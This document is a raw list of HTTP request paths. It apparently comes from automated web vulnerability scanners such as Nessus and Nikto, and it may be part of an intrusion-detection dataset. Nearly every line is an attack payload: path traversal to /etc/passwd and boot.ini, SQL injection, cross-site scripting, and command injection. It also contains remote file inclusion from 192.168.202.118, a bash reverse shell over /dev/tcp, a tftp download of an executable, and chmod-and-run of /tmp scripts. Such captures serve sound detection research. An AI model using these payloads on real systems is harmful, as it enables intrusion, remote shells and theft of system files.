/javascript/hardcore.exe /examples/servlets/servlet/ovlaunch.exe /d765w06j.cfm? /javascript/scripts.exe /i686v90l.cgi? /ywaxntrx.do? /phpmyadmin/doc/index.php?s=/etc/passwd\x00 /scriptssearch_results.dot?search_query=nessus">/ /scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=mbt7mplpoxxxq5dko /javascript/program files.exe /manager/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl /syshelp/cscript/showfunc.stm?func= /l4fz1dqw.nsf? /if69ddo1.php3? /main.php?stuff="&ping\xa0-w\xa07000\xa0-n\xa01\xa01.2.3.4&rem\xa0 /top.php?stuff=;sleep 7 # /? /scripts/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331905182,1,1,1,1,1,1,1--&blogid=1 /scripts/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 2020390524,2,880987929,4,5,6,7,8,9,0,1,2,3 -- /main.php?logout=ver,>q12148819&rem, /ny1b3qq4.x? /main.php?stuff='&sleep\x0910\x09# /scripts/eezuu7xc7ge3.php3 /ovcgi/webappmon.exe?ins=nowait&sel=localhost&act=ping /7uz3ok60.htm? /top.php?stuff="sleep\x099\x09# /scripts/index.php?board=nonexistant1465558133 /d44uk9h2.exe? /index.php?include_files[]=&include_files[query_string]=/etc/passwd /awstatstotals.php?sort={${phpinfo()}}{${exit()}} /help.php?q=ping;-w;11000;-n;1;1.2.3.4|rem; /tukodz3j.fts? /scripts/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1164366855-- /ht8pn8uq.idc? /yver8r9o.kspx? /cgi-bin/starnet/addons/slideshow_full.php?album_name='1273136253 /examples/jsp/checkbox/login.php?user="> /qhvu0pdg.dll? /javascript/webbbs.exe / /boilerplate.asp?nfuse_template=.../.../.../.../.../.../.../.../.../boot.ini&nfuse_currentfolder=/ /scripts/vhost.php?action=logout&time=1331919067 /examples/jsp/cal/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd\x00 /bzuf9ozq.pl? /cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd\x00 /interface/login/login_frame.php?site= and 1=1 /cgi-bin/error.php?selected_theme= /scripts/default.asp /examples/jsp/num/contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd\x00 /oie504mr.htm? /examples/jsp/jsp2/jspx/activatemember?activatecode=&member="> /en-us/account/workarea/contentdesigner/ekformsiframe.aspx?id="> /subscriptionservices/ /scripts/index.php?getapplication=register&checknum=1&args=null /vjbrrppi.fts? /cacti/download.php?language=/etc/passwd\x00 /phpmyadmin/k/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor /phpmyadmin/view_user.php?list=1&letter=&sort_by='select /javascript/debug.exe /scripts/udblphlq4nln.sh /chief's message on violence against women/ /cacti/js/vendors.php?file=../../../../../../../../../../etc/passwd\x00nessus.js /scripts/qg9h0c0svvat.shtml /examples/jsp/jsp2/jspx/view_user.php?list=1&letter=&sort_by='select /cgi-bin/perl.exe?-v /projects/1/repository/annotate?rev=`0<&186-;exec 186<>/dev/tcp/192.168.202.118/17246;sh <&186 >&186 2>&186` /ka'roo/ /javascript/maestro.exe /top.php?stuff='&sleep 9 # /cacti/setcookie.php?u=../../../../../../../../../../../../etc/passwd\x00&plugin=pblang_mult_flaws.nasl /javascript/vendors.exe /scripts/tree.php /subscriptions.yml /scripts/4rzefq7dsowk.pl /help.php?q="\x0auname\x09>q72938489\x09# /pwcgi/smpwservicescgi.exe?target=http://www.nessus.org /javascript/bfc.exe /cgi-bin/rss.php?blogid=1&profile=../../config/config.properties.php\x00 /cacti/include/doc/get_image.php?lang=en&img=../../../../../../../../../../etc/passwd /snmx-cgi/fxm.exe /descriptious/ /main.php?stuff="ping\x0b-w\x0b11000\x0b-n\x0b1\x0b4.3.2.1&rem\x0b /manager/lang/index.php?file=/etc/passwd /cgi-bin/generate.cgi?content=../../../../../../../../../../windows/win.ini\x00board=board_1 /o35zot2r.cfm? /scripts/inc/pipe.php?hcl_path=http://xxxxxx./ /prescription-ultram/ /t7tm4m0b.cfc? /phpmyadmin/index.php?op=default&date=200607' union select 1,1265182078,1,1,1,1,1,1,1,1--&blogid=1 /en-us/33y9gcqq.jspa? /ao22ww7y.cfm? /top.php?stuff=&ver\x0b>q21316317&rem\x0b /6dlc2zm9.asp? /scripts_help/ /feedsplitter.php?format=../../../../../../../../../../etc/passwd\x00&debug=1 /iajtej82.dll? /main.php?logout="|ping\x0c-w\x0c8000\x0c-n\x0c1\x0c1.2.3.4|rem\x0c /javascript/.passwd.db /rpxyx07v.do? /o35zot2r.exe? /scriptsfaq.php?skin=../../admin/manager&tplpath=admin /ygkjkngd.cfc? /unix-scripts/ /d44uk9h2.exe? /top.php?stuff=&rm;q25243259&rem; / /cgi-bin/sawmill6cl.exe?ho+{complete_version} /scriptaculous/ /t7tm4m0b.php3? /javascript/recorder.exe /scripts/contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd\x00 /scripts/rx9ysf2iwv4j.cfm /cgi-bin/index.php?gadget=glossary&action=viewterm&term= /scs86g1p.aspx? /bxnyrhmh.dll? /examples/jsp/colors/index.php?show=../../../../../../../../../../../etc/passwd\x00 /zuihld5m.html? /l13b77e5.nsf? /xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+777+/tmp/cgeqvnsxdv.sh'); function v /cgi-binsearch-results.dot?search_query=nessus">/ /top.php?stuff=';uname >q38627655 # /examples/jsp/sessions/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name= ;id; /top.php?stuff="&rm\x0cq55426988&rem\x0c /javascript/traces.exe /0qhcnefz.kspx? /xampp/phonebook.php?lastname=',acunetix())/*&firstname=1 /iv5vkgam.php? /igtf0zon.aspx? /en-us/oie504mr.dll? /bzuf9ozq.kspx? /recordings/module.php?module=osticket&file=../../../../../../../../../../../etc/passwd /help.php?q="&ver&rem /169okeyj.html? /openautoclassifieds/friendmail.php?listing= /administrator/gallery/navigation.php?directory=\" /en-us/h5sc3gxy.nsf? /cacti/atomicboard/index.php?location=../../../../../../../../../../../../../../../etc/passwd /en-us/dda2qr7j.cfc? /examples/jsp/num/pfdispaly.cgi?../../../../../../etc/passwd /smpwservicescgi.exe /javascript/feeds.exe /moodle/filter/tex/texed.php?formdata=foo&pathname=foo";ls+-l;rm+/tmp/pcousamoyu" /cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd /i7prbs22.cgi? /b5xdqgz2.do? /examples/jsp/checkbox/admin/admin.php?sid=' /nmw0do67.exe? /scripts/_xuzlr7swn95.php3 /ghswfouu.cfc? /cgi-binsearch_results.dot?search_query=nessus">/ /examples/jsp/checkbox/rot13sj.cgi?/etc/passwd /scripts/gwweb.exe?help=bad-request /cgi/query?mss=../config /t7tm4m0b.nsf? /superduperdescription/ /manager/library/adodb/server.php?sql='adodb_sql_sql_injection.nasl /javascript/bank.exe /3hlysl2x.cfc? /iktok2bw.cfc? /cacti/cgiforum.pl?thesection=../../../../../../../../etc/passwd\x00 /htbin/a1disp3.cgi?../../../../../../../../../../etc/passwd /examples/jsp/sessions/help.php?section='qualiteam_xcart_sql_xss.nasl /606wkcop.php? /examples/servlets/servlet/admin/admin.php?sid=0' /cgi-bin/index.php?src=1&_common=1&time=1331919011&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\x00 /include/default_header.php?script_path=http://192.168.202.118:8080/tzhfyzkbomspvm? /server.pt?open=space&name=";} /7u1pb2xi.html? /examples/servlets/servlet/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor /javascript/foo.exe /scripts/base_local_rules.php?dir= /fcgi-bin/fileseek.cgi?foot=&head=;cat /etc/passwd| /eg2u8pbv.htm? /help.php?q="&del\x0cq93118475&rem\x0c /xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+555+/tmp/zffcwqffhn0;'); function v /javascript/loading.exe /scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331908785&lang_crm=../../vtigerservice.php\x00 /cgi-bin/www/delivery/ac.php?bannerid=-1331904183+or+1=1+--+';passthru(base64_decode($_server[http_nessus_0oywsnwb]));die;/* /cwmail.exe /main.php?stuff=;del q92696358 # /scripts/ws_ftp.ini /x2gyorli.do? /9o6g5vkn.cfc? /templates/admin/login_form.php?msg_login= /scripts/sendcard.php?view=1&id='sendcard_sql.nasl /msadm/domain/index.php3?account_name=\"> /examples/jsp/cal/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../../../../../../../../../../..//etc/passwd\x00 /jw64yq8u.aspx? /zv8tv7h8.php3? /javascript/.htaccess///skipfish.invalid/;? /index.php?_language=../../../../../../../../../../etc/passwd\x00 /m4kkjf8l.dll? /main.php?logout=;rm\x09q14218261\x09# /scripts/?cmd=config /cacti/simple/view_page?mv_arg=|cat /etc/passwd| ../../../../../../../../../../etc/passw* /cgi-bin/logbook.pl?file=../../../../../../../../../../bin/cat /etc/passwd\x00| /en-us/account/whois.cgi?action=load&whois=;id /cgi-bin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd /scripts/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1332009305',null,null,null,null -- fi?/etc/passwd /top.php?stuff=1 '" -- /en-us/.php /ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd /opensiteadmin/scripts/classes/formmanager.php?path=http://192.168.202.118:8080/zz5thkvtmlgl?\x00 /cgi-bin/index.php?id=_pb9wansu9' /cgi-bin/dataservice.asmx/authuser?username='nessus1331919210&password=nasl&needcompress=0 /sys/code/box.inc.php?config["sipssys"]=http://192.168.202.118:8080/moclyxlwqyfjnp? /recordings/lib/owl_api.php?xrms_file_root=../../../../../../../../../../../../etc/passwd\x00 /main.php?logout='&uname >q16695623 # /adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}// /javascript/.passwd.py /cgi-bin/webappmon.exe?ins=nowait&act=natping&sel="255.255.255.255 & id&" /help.php?q=\x0auname\x09>q27637243\x09# /javascript/mark.exe /bxnyrhmh.php? /news.php?scriptpath=http://192.168.202.118:8080/2aibfaczmac8?? /examples/jsp/checkbox/faxsurvey?cat /etc/passwd /0z575z74.do? /s7qus4g3.x? /forum1_professionnel.asp?n=1771&nn=100&page=/etc/passwd\x00 /main.php?logout="rm;q97754931&rem; /qb2xy9aw.cfc? /ihd231-xss/ /examples/jsp/colors/detail.asp?nchannel='1 /ddoworrl.cfc? /en-us/s7qus4g3.cgi? /hrttz9fj.php3? /javascript/developers.exe /javascript/bio.exe /phpmyadmin/af.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd /b5xdqgz2.php? /phpmyadmin/documentation.html?phpmyadmin="> /nuh3zirz.kspx? /n9xlumt5.pl? /fmnveedu.htm? /daddy's little princess - scene 2/ // /scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=http://cirt.net/rfiinc.txt? /jdx255ea.fts? /examples/servlets/servlet/_head.php?_zb_path=../../../../../../../../../../etc/passwd\x00 /examples/jsp/error/wordtrans.php?command=show_desc&advanced=1";id; true " /scripts/bpk_bsfe_4vq.html /scripts/cmslogin.aspx /cgi-915/sensepost.exe?/c+dir /cgi-local/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd /opensiteadmin/scripts/classes/fieldmanager.php?path=http://192.168.202.96:8080/swgnhpydbq0t?\x00 /.exe /javascript/purchasing.exe /piranha/secure/passwd.php3 /help.php?q=ver\x09>q72339979&rem\x09 /main.php?stuff="\x0auname # /ap58k3ci.cgi? /dda2qr7j.fts? /evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331908736,1948616015 -- /ygkjkngd.cgi? /examples/jsp/colors/search.cgi?..\..\..\..\..\..\winnt\win.ini /top.php?stuff="\x0arm\x09q52122221\x09# /um7xpn15.fts? /en-us/fo564rei.asp? /admin/news.admin.php?path_to_script=http://192.168.202.96:8080/whmch8ftkt7kv??&cmd=ls /javascript/to.exe /m4kkjf8l.exe? /scripts/gdxlwjnlsr6i.php3 /eei78ore.cgi? /examples/jsp/num/index.php?page=/etc/passwd\x00 /5qnlm5z2.dll? /fcgi-bin/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd /scripts/kfzqb5x87lvq.php3 /b4vng02k.asp? /scripts/item.fts?href=">; /scripts/test11.asp /main.php?stuff="\x0adel\x09q74494385\x09# /? /en-us/account/index.php?id=' /cgi-915/pfdisplay.cgi?'\x0a/bin/cat /etc/passwd|' /phpmyadmin/htsearch?exclude=`/etc/passwd` /fc9t54l7.jsp? /forum1_professionnel.asp?n=1771&nn=100&page=/..../boot.ini /admin/doeditconfig.php?thispath=../includes&config[path]=http://192.168.202.118:8080/moclyxlwqyfjnp? /examples/jsp/jsp2/jspx/starnet/addons/slideshow_full.php?album_name='2005084173 /javascript/benefits.exe /hrttz9fj.exe? /top.php?stuff=&ver\xa0>q92247843&rem\xa0 /scripts/kernel/loadkernel.php?installpath=/etc/passwd\x00 /h21y8w52.aspx? ftp://192.168.24.253/* /l752x1ry.kspx? /search.jsp?q=%" /www/delivery/ac.php?bannerid=-1332009302+or+1=1+--+';passthru(base64_decode($_server[http_nessus_dllvu4k6]));die;/* /en-us/account/index.php?id='union/**/select/**/0,0,1647791366,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- /examples/servlets/servlet/includes/converter.inc.php?include_path=/etc/passwd\x00 /help.php?q='sleep 8 # /iktok2bw.fts? /javascript/~ftp.exe /sprotectlinux/showpage.cgi?page=../html/splx_main.htm /help.php?q="&ping -w 8000 -n 1 1.2.3.4&rem /emailfriend/emailarticle.php?id=\" /javascript/document.bat /static//\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xaeetc/passwd /6dlc2zm9.do? /base_local_rules.php?dir= /ju0u7kfo.jsp? /examples/jsp/security/protected/j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee6~ /egaet53a.jspa? /top.php?stuff=ver;>q99348313&rem; /recordings/pmwiki.php?globals[farmd]=/etc/passwd\x00 /examples/jsp/error/pfdispaly.cgi?../../../../../../etc/passwd /bin/a1disp3.cgi?../../../../../../../../../../etc/passwd /ewc3rz1l.idc? /en-us/dda2qr7j.jspa? /m4kkjf8l.asp? /mpcgi/ion-p?page=../../../../../etc/passwd /examples/jsp/checkbox/index.php?cat=' /h4bi26jd.aspx? /examples/jsp/colors/add_url.htm?node= /subscriptions.jpg /t578vqea.htm? /examples/jsp/error/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../etc/passwd /javascript/htpasswd.py /scripts/index.php?board=nonexistant674192050 /coin_includes/constants.php?_ccfg[_pkg_path_incl]=/etc/passwd\x00 /top.php?stuff=ver\x0b>q75783184&rem\x0b /scripts/9pen4xzgztjn.sh /examples/jsp/checkbox/index.php?id=0rop9yeuxw' /examples/jsp/jsp2/jspx/al_initialize.php?alpath=/etc/passwd\x00 /d5a5renl.kspx? /y8pmygrp.htm? /javascript/pubs.exe /help.php?q="&rm\x09q57946156\x09# /en-us/hipkz026.php? /scripts/1hactwocbsuo.cfm /main.php?logout=\x0auname\x09>q18697999\x09# /scripts/servubrowse.asp /javascript/submit.exe /help.php?q="ver\x09>q14739543&rem\x09 /cgis/pfdispaly.cgi?'\x0a/bin/cat /etc/passwd|' /p043snfr.php3? /scripts/vzdybnanqpc3.php /i686v90l.cfc? //../../../../../../../../etc/passwd\x00 /cgis/a1disp3.cgi?../../../../../../../../../../etc/passwd /hrttz9fj.fts? /cgi-bin/showproduct.php?product=1' /bb000001.pl /examples/jsp/jsp2/jspx/config.php?returnpath=/etc/passwd\x00 /i7prbs22.cgi? /cacti/btdownload.php?type=torrent&file=../../../../../../../../../../etc/passwd /examples/jsp/jsp2/jspx/index.php?action=view&filename=../../../../../../../../../../../../../etc/passwd /help.php?q='\x0auname\x09>q12762848\x09# /cacti/cal_week.php?op=week&catview=999' /apps/pbcs.dll/misc?url=../../../../../../../../../../../../boot.ini messagedetail.asp?msg_id=' /um7xpn15.mscgi? /main.php?logout="|ping -w 9000 -n 1 4.3.2.1|rem /scripts/zq9frlz6fcfp.php /admin/file_manager.php?action=read&filename=../../../../../../../../etc/passwd /0z575z74.htm? /recordings/logbook.pl?file=../../../../../../../../../../bin/cat /etc/passwd\x00| /cgi-bin/guestbook/passwd /8x6w469u.kspx? /kerkhoffs'_law/ /javascript/document.msg /i686v90l.kspx? /javascript/replicated.exe /3j8echh0.html? /examples/servlets/servlet/rss.php?blogid=1&profile=../../config/config.properties.php\x00 /scripts/zq9frlz6fcfp.cfm /cacti/calendar.php?serverpath=/etc/passwd\x00 /cgibin/nph-showlogs.pl?files=../../&filter=.*&linecnt=500&refresh=0&submit=go /main.php?stuff="ver\xa0>q63696925&rem\xa0 /phpnuke/html/.php?name=network_tools&file=index&func=ping_host&hinput=;id /recordings/shoutbox.php?conf=../ /demos/demo.browse.php?filename=/etc/passwd / /fpnpp5zg.pl? /scripts/weigh_keywords.php?etcdir=http://cirt.net/rfiinc.txt? /j4rdyhw8.php? /help.php?q=";uname >q49727674 # /main.php?logout=/' /main.php /scripts/forum.php3?id_article=1&id_forum=-1/**/union/**/select 412834017-- /s7qus4g3.php? /script_saved/ /comments.php?scriptpath=http://192.168.202.96:8080/frznctvhi0i5?? /index.php?page=../../../../../../../../../../../../../../../../../winnt/system32/ipconfig.exe /m2fpztty.pl? /phpmyadmin/index.php?string=' /tuwjta1w.htm? /cleartrust/ct_logon.asp?ctauthmode=basic&ctloginerrormsg=xx&ct_orig_uri=\">< script>alert(1)/script><\" /cgi-915/ppdscgi.exe /main.php?logout="ping;-w;10000;-n;1;4.3.2.1&rem; /javascript/nude.exe /y8pmygrp.do? /scripts/counter.exe /vac1l5vm.htm? /ybz5rz7a.php? /examples/jsp/jsp2/jspx/web_store/web_store.cgi?page=../../../../../../etc/passwd\x00.html /javascript/htpasswd.rhtml /ju0u7kfo.jspa? /examples/jsp/cal/misc/audio.php?recording=../version.inc /grid_subscriptions2/ /scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=lnu3g9zkqrlule9mw /examples/jsp/colors/hw3.cgi?daysonly=0).system('id').( /eei78ore.php3? ../../../../../../../../../../../../etc/passwd / /javascript/hp.exe /qhvu0pdg.php? /cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc/passwd\x00html&cart_id= /main.php?logout=';uname >q89385457 # /scripts/ggvfa_wichxq.asp /eei78ore.php? /javascript/.passwd.dll /src/scripture.php?pageheaderfile=@rfiurl?pageheaderfile=@rfiurl? /securecgi-bin/csusercgi.exe?help+00.abcd.e.fghijk"""> /index.php?config["sipssys"]=http://192.168.202.118:8080/moclyxlwqyfjnp? /javascript/pc.exe http://xxxxxxxxxxx.:80/.cfm /cgi-perl/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head= /nsn/..\util/ren.bas /examples/servlets/servlet/faxsurvey?cat /etc/passwd /zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('/./tmp/fetpkvinrp.sh+>+/dev/null+&')."]=1 /en-us/jnv890lt.jspa? /scripts/save.php?file_save=/etc/passwd /phpmyadmin/notify?from=nessus"|id" /examples/jsp/error/index.php?op=default&date=200607' union select 1,1200541698,1,1,1,1,1,1,1,1--&blogid=1 /help.php?q="ping;-w;11000;-n;1;4.3.2.1&rem; /scripts/zdbyw3dn3gh2.html /q703m78q.kspx? /main.php?stuff="&ver;>q22147997&rem; /help.php?q="|ping\xa0-w\xa09000\xa0-n\xa01\xa04.3.2.1|rem\xa0 /script/tick/allincludefortick.php?path_to_code=http://192.168.202.118:8080/zz5thkvtmlgl? /v3axg1p8.cfm? /p043snfr.kspx? /main.php?logout="|ping;-w;11000;-n;1;1.2.3.4|rem; /javascript/stored.exe /launch.asp?nfuse_application= /cacti/dsweb/services/user-1"> /p043snfr.do? /xfkun1ku.htm? /ghswfouu.cfm? /top.php?stuff="rm\x09q12423295&rem\x09 /main.php?stuff=&uname >q17531529 # /h5sc3gxy.asp? /javascript/reference.exe /interface/login/login_frame.php?site=">< /scripts/vzdybnanqpc3.asp /main.php?stuff="&sleep\x099\x09# /en-us/oie504mr.php3? /scripts/k0pxpjgnimox.cfm /de3v2dd9.aspx? /x7pclv4s.kspx? /scripts/quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd\x00html /scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331918976&lang_crm=../../../../../../../../../../../..//etc/passwd\x00 /fnwhrxyd.htm? /examples/jsp/sessions/forum.php?do=viewtopic&cat=1&topic=1&page=1?alert(document.cookie) /examples/servlets/servlet/index.php?lng=../system_footer&sensor_program=phpsysinfo_241.nasl /bxnyrhmh.aspx? /scripts/misc/info.php /ybz5rz7a.html? /help.php?q="&ping\x09-w\x098000\x09-n\x091\x094.3.2.1&rem\x09 / /main.php?stuff="rm q23955852 # /scripts/ubbthreads.php /azcrfs8d.jspa? /examples/servlets/servlet/?"> /b5xdqgz2.cgi? /169okeyj.mscgi? /scripts/axdgpyi2bn6f.php /scripts/msmmask.exe?mask=/nessus312940811.asp /recordings/admin.php?style=../../../../../../../../../../../../etc/passwd\x00 /examples/jsp/checkbox/index.php?templates_dir=/etc/passwd\x00 /scripts/base_local_rules.php?dir= /javascript/message.exe /scripts/d3z7yywpyeoa.pl /top.php?stuff="&ver&rem /examples/servlets/servlet/resetpw.php?email=../../../../../../../../../../../../etc/passwd /javascript/solved.exe /index.php?action=search&searchfor=\"> /main.php?stuff="&ver;>q86839174&rem; /oie504mr.nsf? /nyvbv05h.cgi? /javascript/dbmodules.exe /mail.php?id='/**/union/**/select/**/1,2,1331919224,4--&blog=1 /examples/jsp/cal/web_store/web_store.cgi?page=../../../../../../etc/passwd\x00.html /fpnpp5zg.asp? ftp://192.168.28.202/* /raanw4ia.mscgi? /cgibin/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd /scripts/k0pxpjgnimox.shtml /h5i6crm3.mscgi? /hipkz026.php? /6n7aacgg.cfm? /examples/jsp/num/demos/demo.browse.php?filename=/etc/passwd /jnt3f86c.htm? /help.php?q=uname\x09>q77267797\x09# /bin/windmail.exe? -n c:\boot.ini hacker@hax0r.com | dir c:\\ /javascript/ppt.exe /dda2qr7j.pl? /j2kdmfw4.cfc? /index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331918993',null,null,null,null -- /examples/jsp/jsp2/jspx/index.php?user_langue=../../../../../../../../../../etc/passwd /0rufe52p.php3? /static//..\..\..\..\..\..\..\..\etc/passwd /cgi-915/a1stats/a1disp3.cgi?../../../../../../../etc/passwd /main.php?stuff="ping,-w,9000,-n,1,4.3.2.1&rem, /_vti_bin/shtml.exe /help.php?q="rm\x0cq43711515&rem\x0c /main.php?stuff=";rm\x09q18442351\x09# /cgi-bin/..\xe0\x80\xaf..\xe0\x80\xaf..\xe0\x80\xaf..\xe0\x80\xaf..\xe0\x80\xaf../winnt/system32/cmd.exe?/c+dir+c:\+/og /main.php?stuff="ping -w 10000 -n 1 4.3.2.1&rem /nuh3zirz.php3? /bin/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd| /o6ebbirj.cgi? /examples/jsp/cal/viewcvs.cgi/?cvsroot= /javascript/~log.exe /cgi-bin/index.php?op=default&date=200607' union select 1,1192121872,1,1,1,1,1,1,1,1--&blogid=1 /cgi-bin/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904240','5'-- /script/plugins/phpgacl/admin/index.php?path_inc=http://192.168.202.118:8080/zz5thkvtmlgl? /phpmyadmin/documentation.html?'"=1 /index.php?cid=' /cacti/nucleus/libs/pluginadmin.php?globals[dir_libs]=/etc/passwd\x00 /examples/jsp/sessions/sawmill6cl.exe?ho+{complete_version} /apavxugx.jsp? /javascript/pool.exe /examples/jsp/num/index.php?_language=../../../../../../../../../../etc/passwd\x00 /aj3pf49c.cfm? /main.php?logout="&ping,-w,11000,-n,1,4.3.2.1&rem, /imp/mailbox.php3?actionid=6&server=x&imapuser=x';somesql+--&pass=x /scripts/weigh_keywords.php?etcdir=http://192.168.202.96:8080/4dckqcc0acprbz? /9ko6m4c8.php3? /scripts/index.php?id='union/**/select/**/0,0,521532225,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- /top.php?stuff="&del q85387982 # /javascript/.passwd.csproj /javascript/catalogs.exe /jdx255ea.cfc? /recordings/phf?qalias=x\x0a/bin/cat /etc/passwd /examples/jsp/num/popup.php?include_path=/etc/passwd\x00 /top.php?stuff="\x0asleep\x097\x09# /scripts/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331905123',null,null,null,null -- /en-us/9kr0ih0v.asp? /javascript/running.exe /cgi-bin/home/search.asp?nchannel='1 /main.php?logout="del q21367835&rem /cgi-bin/..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf../winnt/system32/cmd.exe?/c+dir+c:\+/og /rv98iwjp.htm? /cgi-bin/af.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd /phpmyadmin/documentation.html?phpmyadmin=/etc/passwd /examples/jsp/error/calendar_admin.pl?config=|cat /etc/passwd| /scripts/ck8pj.exe?/x+/c+tftp -i 192.168.202.118 get durjhxa1 qowmcdks.exe /phpmyadmin/documentation.html?phpmyadmin=|cat /etc/passwd| /main.php?logout='del\x09q76232693\x09# /examples/jsp/num/install.php?newlang=../../cpg_error.log\x00 /javascript/closing.exe /javascript/monitoring.exe /en-us/fo564rei.cgi? /prescription010507/ /if69ddo1.nsf? /javascript/roaming.exe /6qbynt4f.asp? /jnv890lt.jspa? /6qbynt4f.kspx? /3hlysl2x.pl? /main.php?logout="ping;-w;11000;-n;1;4.3.2.1&rem; /examples/jsp/cal/calendar_admin.pl?config=|cat /etc/passwd| /cgi-bin/search.jsp?q=%" /rtph263dumpscript/ /scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=10nbpndw5e2ir1ncx /cgi-bin/mlog.html?screen=/etc/passwd /main.php?stuff="&ping\x09-w\x098000\x09-n\x091\x091.2.3.4&rem\x09 /examples/jsp/jsp2/jspx/cal_make.pl?p0=../../../../../../../../../etc/passwd\x00 /zroo33l4.php? /top.php?stuff='\x0asleep\x097\x09# /scs86g1p.cfc? /d5a5renl.html? /scripts/mapserv?map=mapserver_detect.nasl.map /javascript/corporate.exe /phpmyadmin/index.php?chemin=../../../../../../..//etc /syshelp/stmex.stm?foo=123&bar= /ju0u7kfo.php? /shoutbox/expanded.php?conf=../../../../../../../etc/passwd /help.php?q="rm\x09q12928131\x09# /en-us/account/more.php?id=1' /examples/servlets/servlet/forum_2.php?msg=10&return= /m2fpztty.idc? /l13b77e5.htm? /javascript/.passwd.stackdump /examples/jsp/num/mailbox.php3?actionid=6&server=x&imapuser=x';somesql&pass=x /javascript/code.exe /manager/activatemember?activatecode=&member="> /o1zj4u9v.asp? /help.php?q='\x0auname # /javascript/hit.exe /main.php?stuff="ping\x09-w\x0910000\x09-n\x091\x091.2.3.4|rem\x09 /subscriptions.doc /include/scripts/run_auto_suspend.cron.php?dir=@rfiurl /nyjgaorz.kspx? /bugs/forgot_password.php?email=\"> /jnt3f86c.dll? /phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331919142&lang_crm=../../vtigerservice.php\x00 /moodle/filter/tex/texed.php?formdata=foo&pathname=foo";ls+-l;rm+/tmp/ukirnkmpbn" /script_path/installation/index.php?mosconfig_absolute_path=http://192.168.202.96:8080/4dckqcc0acprbz?? /cgi-914/powerup/r.cgi?file=../../../../../../../../../../etc/passwd /main.php?stuff=&ver,>q61913742&rem, /3j8echh0.php? /subscriptions.config /tlhhwkvs.exe/ /javascript/auth.exe /awstats/awstats.pl?migrate=|echo;chmod 555 /tmp/urcppbumwm0;echo|awstats379091.txt /opensiteadmin/scripts/classes/form.php?path=http://192.168.202.96:8080/4dckqcc0acprbz?\x00 /help.php?q=uname >q18373347 # /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}// /speech-transcript/ /zv8tv7h8.do? /t7tm4m0b.aspx? /manager/index.php?op=default&date=200607' union select 1,1128524552,1,1,1,1,1,1,1,1--&blogid=1 /help.php?q='\x0adel\x09q47355772\x09# /examples/jsp/sessions/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine= /m2fpztty.html? /phpmyadmin/sawmillcl.exe?ho+{complete_version} /sscript/ /cgi-bin/webplus?script=/../../../../etc/passwd /subscriptions.part /g8nu2yy7.jspa? /top.php?stuff=';rm q26271527 # /scripts/coin_includes/constants.php?_ccfg[_pkg_path_incl]=/etc/passwd\x00 /7dbjwpw6.cfm? /cgibin/pfdispaly.cgi?'\x0a/bin/cat /etc/passwd|' /top.php?stuff="ping -w 7000 -n 1 1.2.3.4&rem /cgi-bin/index.php?p='nessus /main.php?stuff="sleep 11 # /en-us/odzk29aa.nsf? /scripts/prnnucptkixl.php /ju0u7kfo.nsf? /ydexw8by.x? /main.php?logout="&uname >q45435148 # /cgi-win/ion-p?page=../../../../../etc/passwd /cgibin/gw5/gwweb.exe?help=bad-request 